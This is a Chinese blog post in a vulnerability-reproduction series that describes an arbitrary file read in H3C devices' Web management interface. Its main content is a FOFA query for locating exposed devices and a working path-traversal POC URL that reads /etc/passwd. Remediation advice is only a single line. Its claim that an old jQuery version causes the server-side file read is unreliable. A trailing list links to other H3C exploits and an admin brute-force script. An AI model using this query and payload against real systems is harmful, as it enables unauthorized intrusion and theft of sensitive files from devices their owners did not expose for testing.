【漏洞复现】H3C Web网管登录任意文件读取漏洞

最新推荐文章于 2024-06-17 03:27:21 发布
最新推荐文章于 2024-06-17 03:27:21 发布
阅读量1.9k 收藏 11
点赞数 12
文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/136151552
版权
【漏洞复现】 专栏收录该内容
146 篇文章 1 订阅

已下架不支持订阅

Nx01 产品简介

        H3C设备的Web网管是指H3C公司生产的网络设备的网络管理界面。它可以通过Web浏览器进行访问和操作,以实现对网络设备的配置、管理和监控。

Nx02 漏洞描述

        jquery旧版本存在任意文件读取漏洞,允许攻击者在受害者的服务器上读取任意文件。H3CWeb网管部分使用过时的jquery版本导致存在任意文件读取漏洞。

Nx03 产品主页

fofa-query: body="/webui/js/jquerylib/jquery-1.7.2.min.js"

Nx04 漏洞复现

POC:

/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd

Nx05 修复建议

建议联系软件厂商进行处理。

晚风不及你ღ
关注
  • 12
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录

已下架不支持订阅

h3c网络管理系统任意文件读取漏洞(含批量验证poc)
weixin_43567873的博客
04-01 276
h3c网络管理系统任意文件读取漏洞(含批量验证poc)
漏洞复现H3C 路由器多系列信息泄露漏洞
晚风不及你
02-19 2039
H3C路由器是一款高性能的路由器产品,具有稳定的性能和丰富的功能。它采用了先进的路由技术和安全机制,可以满足不同用户的需求,广泛应用于企业、运营商和数据中心等领域。
暴力破解H3C管理员.py
10-03
暴力破解H3C管理员弱密码,仅供测试学习使用
漏洞复现】华三 H3C路由器 userLogin.asp 信息泄漏漏洞
最新发布
凝聚力安全团队
06-17 801
H3C路由器多系列存在信息泄露漏洞,攻击者可以利用该漏洞获取备份文件中的管理员账户及密码等敏感信息。H3C路由器是一款高性能的路由器产品,具有稳定的性能和丰富的功能。它采用了先进的路由技术和安全机制,可以满足不同用户的需求,广泛应用于企业、运营商和数据中心等领域。
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 738
任务环境说明:服务器场景:Server1。
关于H3C路由器漏洞的情况说明
weixin_44106034的博客
10-19 2683
ER3108G-CN,ER3108GW-CN,ER2100-CN,ER2100V2,ER2100n,ER2210C-CN,ER3100-CN,ER3260-CN,ER5100-CN,ER5200-CN,ER6300-CN,ER8300-CN,ER3200-CN已停止维护。H3C MC101/MC102/MC500/H100/H100-EI/H200/H200-EI、H3C X3路由器、H3C Magic R1/R100/B1/B0/B3/M2都已经停止维护。
H3C SecParh堡垒机任意用户登录与远程执行代码漏洞
剁椒鱼头没剁椒的博客
02-02 3371
这里确实成功登录上去了,若设定三权的话,可能存在把admin用户设定为类似与这里的审计管理员,那么就需要测试是否能够跳转到操作管理员或者其它的一些管理员账号上去。这里就不再深入测试,只是提供一个思路。我使用火狐浏览器,我访问后就自动将信息进行下载,不过也有浏览器直接跳转界面的也行,都能够看到。
漏洞复现 || H3C iMC 存在远程命令执行
失心少年
07-07 898
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!H3C Intelligent Management Center(以下简称 H3C iMC)是一款业务智能管理平台。攻击者可利用漏洞通过构造特殊的请求造成远程命令执行。
h3c多系列路由器存在任意用户登录漏洞
m0_49025459的博客
08-28 2993
也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。密码就在vtypasswd之后,账户一般都是admin。根据根据系统名修改payload。发送请求包,获取管理员账号密码。
H3C任意命令执行漏洞
战神/calmness的博客
05-23 9313
H3C漏洞 目录 简述 过程 修复建议 参考链接 简述 H3C iMC智能管理中心 云计算(cloud computing):“云计算是一种计算模式,利用互联网技术把大量可扩展和弹性的IT相关能力作为一种服务提供给多个用户(Gartner)”。提供资源的网络被称为“云”。“云”中的资源在使用者看来是可以无限扩展的,并且可以随时获取,按需使用,随时扩展,这使得应用提供者无需为繁琐的细节而烦恼,能够更加专注于自己的业务,有利于创新和降低成本。 过程 body="iMC来宾接入自助管理..
H3C无线控制器web网管配置指南
11-03
H3C无线控制器Web网管配置指南》是针对H3C公司无线控制器产品的操作手册,旨在帮助用户理解和掌握如何通过Web界面进行设备管理。该指南涵盖了多个关键配置领域,包括基本设置、网络连接、无线服务、安全策略、服务...
H3C产品Web网管配置指导书汇总集.rar
08-30
H3C WX系列无线控制产品 Web网管配置指导 H3C SecPath F100-C-AI防火墙 Web配置指导 H3C SecPath Web应用防火墙系列 Web配置指导 H3C SecPath系列高端防火墙 Web配置手册 H3C WA系列无线局域网接入点设备Web网管 H3...
通过WEB网管登录 H3C
03-20
通过WEB网管登录 H3C 通过WEB网管登录 H3C 通过WEB网管登录 H3C
H3C ER G2系列路由器敏感信息泄露漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
09-20 1936
H3C ER2200G2是H3C推出的新一代高性能企业级路由器,采用全新硬件架构、具备丰富的软件功能、支持全面的安全策略。定位于以太网/光纤/xDSL接入的中小商业市场(SMB),可部署于需要高速Internet接入的政府机构、中小企业、餐饮连锁、酒店、学校、医院、网吧等网络环境。H3C ER G2系列版本存在敏感信息泄露漏洞。攻击者通过actionpolicy_status跳转别的接口,利用该漏洞访问ER2200G2.cfg文件
漏洞复现H3C SecParh堡垒机任意用户登录漏洞
晚风不及你
02-19 789
H3C SecParh堡垒机是一款专业用于安全管理的堡垒机产品,它通过强大的访问控制功能和安全审计功能,实现对网络服务器的远程安全管理和监控。
H3C iMC 存在远程命令执行漏洞
nnn2188185的博客
04-22 3387
H3C Intelligent Management Center(以下简称 H3C iMC)是一款业务智能管理平台。 H3C Intelligent Management Center 存在命令执行漏洞。攻击者可利用漏洞通过构造特殊的请求造成远程命令执行。
H3C多系列路由器存在前台RCE漏洞(含批量验证poc)
weixin_43567873的博客
04-05 708
H3C多系列路由器存在前台RCE漏洞(含批量验证poc)
web常见漏洞
阿布哥的读书笔记
04-20 1213
11年江湖11年情 很久没有来这里写写东西、发发牢骚了,
h3c 交换机web网管操作指南
09-08
H3C交换机的Web管理界面是一种通过浏览器访问的图形化用户界面,可以方便地进行交换机的管理和配置。以下是H3C交换机Web网管操作指南的一些基本步骤: 1. 首先,要确保电脑与交换机处于同一网段,并且可以相互通信。可以通过ping命令来测试连接是否正常。 2. 打开任意一种支持Web浏览的浏览器,如Chrome、Firefox等,输入交换机的管理IP地址,按下回车键。 3. 出现登录界面后,输入交换机的用户名和密码,然后点击登录。默认情况下,用户名为admin,密码为空。 4. 成功登录后,可以在左侧的导航栏中找到不同的配置选项,如端口配置、VLAN配置等。 5. 在端口配置中,可以设置端口速率、双工模式、VLAN绑定等。 6. 在VLAN配置中,可以新建、编辑或删除VLAN,进行端口的划分和隔离。 7. 在安全配置中,可以进行AAA认证、端口安全、STP设置等。 8. 在系统管理中,可以进行系统时间设置、系统日志查看等。 9. 在保存配置之前,建议先导出当前的配置文件备份,以防发生意外。 10. 需要注意的是,H3C交换机的Web管理界面功能强大而复杂,对于一些高级配置,建议参考官方的用户手册来进行操作。 以上是关于H3C交换机Web网管操作指南的简要介绍,希望对您有所帮助!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值